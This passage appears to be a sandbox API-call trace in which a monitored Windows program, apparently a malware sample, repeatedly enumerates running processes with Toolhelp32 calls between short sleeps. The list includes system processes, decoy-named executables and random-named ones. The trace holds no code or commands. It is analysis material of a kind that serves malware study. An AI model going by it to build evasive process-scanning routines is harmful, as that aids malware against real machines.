lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.159] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.161] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.162] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.163] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.164] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.165] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.166] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.167] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.168] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.170] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.171] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.172] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.173] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.174] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.175] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.176] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.177] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.178] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.179] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.180] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.181] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.182] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.183] CloseHandle (hObject=0xc4) returned 1 [0111.183] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xbc [0111.189] Process32FirstW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.190] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.191] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.192] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.193] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.194] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0111.195] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0111.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.196] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.197] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x17, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x330, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.198] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x358, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.199] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x39c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0111.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.200] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.201] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0111.202] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.203] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x540, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.204] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x358, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0111.206] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x598, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x330, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0111.227] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x584, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0111.229] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.230] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0111.231] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="fired-isolation-deny.exe")) returned 1 [0111.232] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="penguin weight doctrine.exe")) returned 1 [0111.234] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x49c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="requires bowling ireland.exe")) returned 1 [0111.236] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4e8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="xplivecam.exe")) returned 1 [0111.238] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="kissingaerospace.exe")) returned 1 [0111.239] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x230, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="slopefirewall.exe")) returned 1 [0111.241] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x118, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="motors.exe")) returned 1 [0111.242] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ins.exe")) returned 1 [0111.243] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x504, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="marble.exe")) returned 1 [0111.244] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="enlargement_zen_vb.exe")) returned 1 [0111.245] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x79c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="manuals_z.exe")) returned 1 [0111.246] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x810, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="infant coins forced.exe")) returned 1 [0111.247] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="attend.exe")) returned 1 [0111.249] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x830, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="concerned.exe")) returned 1 [0111.250] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x840, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="sandwichtelevisions.exe")) returned 1 [0111.251] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x850, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="pickup.exe")) returned 1 [0111.252] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x860, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="athletics-americans.exe")) returned 1 [0111.253] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x870, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="proudlydocumented.exe")) returned 1 [0111.254] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x880, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="ajbehaviord.exe")) returned 1 [0111.255] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x940, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0111.256] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x960, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0111.257] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xaec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xacc, pcPriClassBase=8, dwFlags=0x0, szExeFile="XEY8d7zI.exe")) returned 1 [0111.258] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc14, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xba4, pcPriClassBase=8, dwFlags=0x0, szExeFile="LSfkRHur.exe")) returned 1 [0111.259] Process32NextW (in: hSnapshot=0xbc, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc40, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xc0c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Sypykbck.exe")) returned 1 [0111.260] CloseHandle (hObject=0xbc) returned 1 [0111.260] Sleep (dwMilliseconds=0x12c) [0111.596] CreateToolhelp32Snapshot (dwFlags=0xf, th32ProcessID=0x0) returned 0xc4 [0111.602] Process32FirstW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0111.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0111.603] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0111.604] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.605] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0111.606] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0111.607] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0111.608] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0111.608] Process32NextW (in: hSnapshot=0xc4, lppe=0x12f9b0 | out: lppe=0x12f9b0*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, 